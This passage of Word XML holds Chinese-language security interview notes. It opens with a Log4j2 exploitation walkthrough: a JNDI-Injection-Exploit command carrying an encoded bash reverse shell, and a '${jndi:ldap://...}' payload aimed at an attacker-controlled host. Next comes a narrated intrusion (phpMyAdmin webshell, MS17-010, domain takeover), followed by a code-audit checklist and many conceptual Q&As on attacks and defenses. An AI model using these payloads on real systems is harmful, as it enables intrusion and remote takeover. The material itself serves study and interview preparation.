          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>01、漏洞发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过burp插件的方式，将Log4j2漏洞检测能力集成到burp进行被动扫描。在访问网站抓包的过程中，检测到目标站点存在Log4j2 RCE漏洞。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02、确认漏洞参数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对每个数据包里都夹带多个参数注入Payload，我们需要进一步定位到具体的漏洞参数位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）登录ceye.io，可以查看当前的dnslog。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）对比burp参数注入的payload和dnslog请求，可初步确认参数username存在Log4j2 RCE漏洞。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03、构建ldap服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过JNDI注入利用的工具，构建好恶意类地址和ldap服务，为进一步漏洞利用做好准备。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）构建payload，将要执行的命令进行base64编码，可通过Java Runtime 配合 bash 编码实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在线编码地址:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.jackson-t.ca/runtime-exec-payloads.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）用JNDIExploit启动一个ldap的服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的bash反弹shell命令" -A “监听的IP地址”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04、获取目标权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用Log4j2漏洞向目标服务器发送构造的payload语句，反弹shell，从而获取目标服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）启动端口监听</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）在burp进行构造payload，url编码后发送请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Payload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?username=${jndi:ldap://xxx.xxx.xxx.xxx:1389/pgc2pp}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端成功接收到bash反弹的shell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渗透经历：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外网信息收集（phpstudy探针）找到后台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过Phpmyadmin的弱口令登录后台，利用日志文件general-log写入webshell，先查询全局变量设置，开启日志，设置日志储存路径，再写入一句话木马，蚁剑连接。或者收集到后台地址及账号密码登录后，通过前台模板创建处写入一句话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就内网横向渗透，先关闭防火墙，msf生成木马并监听，成功上线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上线cs：设置监听，生成powershell，成功上线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用系统命令得到很多信息：ip信息、主机信息、systeminfo查补丁、进程及服务、域信息、当前登录域信息及用户信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用msf扫描发现ms17-010永恒之蓝，拿下域控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代码审计：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一，先用fortify扫描一遍，排查一些比较明显的问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二，看一看配置文件maven、packet.json，看看是否采用一些有问题的的中间件版本、有漏洞的第三方应用组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三，排查一下硬编码，明文存储这些，password、token、url、公网IP、端口等，敏感信息（个人信息）泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四，排查一下是否有使用危险的函数，会造成xxe、反序列化那些readobject（unresellize），不同开发语言的函数、方法不一样，具体我不记得了，一百度就有。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第五，排查完这些，看看对外暴露的接口，接收参数是否可控，像重定向要用白名单写死，像sql参数要用预编译等等，从接收参数的地方层层排查，像上传下载的方法或接口，是否过滤危险字符../这些，是否写死上传下载目录，是否有大小限制，完整性校验，还有如果有解压功能的，要检查是否有zip炸弹校验（判断压缩比），还有，重要接口操作之前，是否有合理的权限校验等等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第六，密码算法：找密码密钥，看看是否用了安全的密码算法，加解密，不安全的密码Des。 目前基本使用的是对称加密中的AES。以及非对称加密的ASL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第七，异常处理：是否敏感异常，是否处于信任域，是否有安全机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第八，日志打印：直接（明文）打印敏感信息、间接打印敏感信息.。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第九，序列化操作：是否包含敏感信息，是否有安全机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十，闲置的代码应删除和接口功能，而不是注释掉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厂商安全设备：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安恒明鉴，阿尔法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绿盟极光，漏扫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>奇安信天眼，tip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360天擎 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>青藤云</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启明不了解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安天也有安全软件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>php爆绝对路径方法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>单引号引起数据库报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>访问错误参数或错误路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>探针类文件如phpinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>扫描开发未删除的测试文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>google hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>phpmyadmin报路径：/phpmyadmin/libraries/lect_lang.lib.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用漏洞读取配置文件找路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>恶意使用网站功能，如本地图片读取功能读取不存在图片，上传点上传不能正常导入的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>你常用的渗透工具有哪些</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>burp、nmap、sqlmap、awvs、蚁剑、冰蝎、dirsearch、御剑等等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>xss盲打到内网服务器的利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>钓鱼管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>鱼叉式攻击和水坑攻击？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>鱼叉攻击：指利用木马程序作为电子邮件的附件，发送到目标电脑上，诱导受害者去打开附件来感染木马</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>水坑攻击：分析攻击目标的上网活动规律，寻找攻击目标经常访问的网站的弱点，将网站攻破并植入恶意程序，等待目标访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>什么是虚拟机逃逸？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用虚拟机软件或者虚拟机中运行的软件的漏洞进行攻击，以达到攻击或控制虚拟机宿主操作系统的目的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中间人攻击？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>在同一个局域网中，通过拦截正常的网络通信数据，并进行数据篡改和嗅探</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>防御：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>在主机绑定网关MAC与IP地址为静态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在网关绑定主机MAC与IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用ARP防火墙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TCP三次握手过程？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第一次握手：建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第二次握手：服务器收到syn包,必须确认客户的SYN（ack=j+1）,同时自己也发送一个SYN包（syn=k）,即SYN+ACK包,此时服务器进入SYN_RECV状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第三次握手：客户端收到服务器的SYN＋ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手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七层模型？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>应用层、表示层、会话层、传输层、网络层、数据链路层、物理层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对于云安全的理解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网状的大量客户端对网络中软件行为的异常监测，获取互联网中木马、恶意程序的最新信息，传送到Server端进行自动分析和处理，再把病毒和木马的解决方案分发到每一个客户端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了解过websocket吗？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WebSocket是一种在单个TCP连接上进行全双工通信的协议，最大特点是服务器可以主动向客户端推送信息，客户端也可以主动向服务器发送信息，是真正的双向平等对话。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DDOS是什么？有哪些？CC攻击是什么？区别是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DDOS：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>分布式拒绝服务攻击，利用合理的服务请求来占用过多的服务资源，从而使合法用户无法得到服务的响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>主要方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SYN Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>UDP Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ICMP Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Connection Flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>HTTP Get</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>UDP DNS Query Flood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CC攻击：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面，造成服务器资源的浪费，CPU长时间处于100%，网络拥塞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两者区别：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>CC攻击网页，DDOS攻击服务器，更难防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CC门槛较低，DDOS需要大量服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CC持续时间长，DDOS产生的影响大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land攻击是什么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>局域网拒绝服务攻击，DDOS攻击的一种，通过发送精心构造的、具有相同源地址和目标地址的欺骗数据包，致使缺乏相应防护机制的目标设备瘫痪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你会如何进行信息收集？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务器信息：ip、中间件、操作系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>域名whois、ipwhois、网段归属</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>子域名探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>网站目录扫描、接口信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>各大引擎搜索相关信息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什么是CRLF注入攻击？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过“回车”和“换行”字符注入HTTP流，实现网站篡改、跨站脚本、劫持等。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防止XSS，前端后端两个角度？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>前端：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>用户输入特殊字符过滤转义为html实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户输出编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>后端：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>实体化编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>函数过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>限制字符长度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如何防护一个端口的安全？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用WAF、IDS、IPS等设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>危险服务端口禁止对外访问或限制IP访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务定期更新版本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webshell检测思路？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>静态检测：匹配特征码，特征值，危险函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>动态检测：WAF、IDS等设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>日志检测：通过IP访问规律，页面访问规律筛选</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件完整性监控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>发现IIS的网站，怎样试它的漏洞？（根据版本）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL注入问题总结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GPC是什么？开启了怎么绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>GPC：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>php.ini配置文件中的magic_quotes_gpc，实现为get、post、cookie传入的单引号、双引号、反斜线、NULL字符添加反斜线 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>绕过：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>PHP5的GPC对$_SERVER的忽略，可在http请求头注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>二次注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>宽字节注入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web常用的加密算法有什么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>单向散列加密 MD5、SHA、MAC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>对称加密 AES、DES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>非对称加密 RSA、RSA2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XSS除了获取cookies还能做什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>获取管理员ip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xss蠕虫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>钓鱼攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>前端JS挖矿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>键盘记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>屏幕截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>运营商（或其他）网络劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>运营商劫持：广告投放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DNS劫持：通过各种手段篡改DNS，劫持网络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DNS欺骗是什么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击者冒充域名服务器的一种欺骗行为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>缓冲区溢出原理和防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>当写入缓冲区的数据量超过该缓冲区所能承受的最大限度时，发生缓冲区溢出，溢出的数据被黑客加以利用，形成远程代码执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>防御：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>基于操作系统防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>缓冲区边界检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>安全编程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网络安全事件应急响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>断网：条件允许时优先断网，防止黑客进一步操作或删除痕迹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>取证：通过分析登录日志、网站日志、服务日志寻找黑客ip，查看黑客进行的操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>备份：备份服务器文件，对比入侵前后产生变化的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>查漏：通过上述步骤寻找业务薄弱点，修补漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>杀毒：清除黑客留下的后门、webshell、管理账号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>溯源：通过黑客ip地址，入侵手段等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>记录：归档、预防</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>企业内部安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实名制联网 重要网段隔离 禁止接入任何USB设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>禁用WIFI网络 IP与MAC地址绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>部署网络监控、IDS、IPS设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>定期培训，提高员工安全意识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业务上线前，怎么测试，从哪些角度测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>安全测试：寻找产品漏洞，页面漏洞，服务漏洞，敏感信息泄露，逻辑漏洞，弱口令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>性能测试：压力测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>功能完整性测试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应用有漏洞，但是无法修复和停用，你怎么办</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>限制IP白名单访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用WAF、IDS、防火墙设备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CSRF怎么防护？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证HTTP Referer字段</w:t>
      </w:r>
    </w:p>
    <w:p>
